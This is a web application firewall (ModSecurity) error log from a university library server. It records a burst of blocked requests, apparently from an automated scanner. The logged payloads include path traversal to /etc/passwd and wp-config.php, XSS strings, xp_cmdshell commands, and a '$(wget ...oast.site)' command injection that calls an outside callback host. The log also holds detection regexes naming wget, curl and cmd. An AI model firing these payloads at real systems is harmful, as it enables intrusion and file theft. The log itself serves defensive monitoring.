[Tue Aug 29 11:45:17.411037 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAe3@KUAAAAA"]
[Tue Aug 29 11:45:19.387148 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAfSWjQAAAAB"]
[Tue Aug 29 11:45:20.389334 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhxwmcAAAAv"]
[Tue Aug 29 11:45:23.365254 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAe3@K4AAAAA"]
[Tue Aug 29 11:45:23.396636 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhxwnAAAAAv"]
[Tue Aug 29 11:45:24.370484 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhkLgIAAAAh"]
[Tue Aug 29 11:45:24.384044 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135MCo-f0AAAdQ3zwAAAAV"]
[Tue Aug 29 11:45:25.381394 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAe3@LIAAAAA"]
[Tue Aug 29 11:45:25.396474 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhzvbQAAAAx"]
[Tue Aug 29 11:45:25.408866 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135cCo-f0AAAhT3xsAAAAD"]
[Tue Aug 29 11:45:27.363779 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhlz5EAAAAi"]
[Tue Aug 29 11:45:28.451590 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAfiYvYAAAAg"]
[Tue Aug 29 11:45:29.406351 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhkLggAAAAh"]
[Tue Aug 29 11:45:30.390876 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhkLgwAAAAh"]
[Tue Aug 29 11:45:30.427252 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAhgoIUAAAAb"]
[Tue Aug 29 11:45:35.434552 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhrqJ8AAAAo"]
[Tue Aug 29 11:45:36.597420 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4Da0AAAA2"]
[Tue Aug 29 11:45:43.541483 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gas9dd4p9nu1u7.oast.site found within TX:1: cjmnbitjmimt14dgn26gas9dd4p9nu1u7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAfiYxcAAAAg"]
[Tue Aug 29 11:45:47.485528 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhui1UAAAAr"]
[Tue Aug 29 11:45:48.659617 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAhBSDAAAAAX"]
[Tue Aug 29 11:45:48.994264 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi3ZzMAAAAP"]
[Tue Aug 29 11:45:49.387825 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi5uAwAAAAS"]
[Tue Aug 29 11:45:51.422350 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAfEB4MAAAAO"]
[Tue Aug 29 11:45:56.411467 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAARphPcAAAAU"]
[Tue Aug 29 11:46:01.365270 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAi5uBQAAAAS"]
[Tue Aug 29 11:46:01.424147 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhzvfsAAAAx"]
[Tue Aug 29 11:46:02.409410 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhtjh4AAAAq"]
[Tue Aug 29 11:46:02.429559 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAi-Q9wAAAAH"]
[Tue Aug 29 11:46:07.379653 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26ggw9cf3d9jp1dp.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAib5yEAAAAA"]
[Tue Aug 29 11:46:08.420812 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhT32MAAAAD"]
[Tue Aug 29 11:46:09.496820 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-kAAAAi"]
[Tue Aug 29 11:46:09.536921 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5gAAAAF"]
[Tue Aug 29 11:46:12.480228 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAfEB7gAAAAO"]
[Tue Aug 29 11:46:12.482933 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAi-Q-MAAAAH"]
[Tue Aug 29 11:46:13.386218 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAi0JJsAAAAK"]
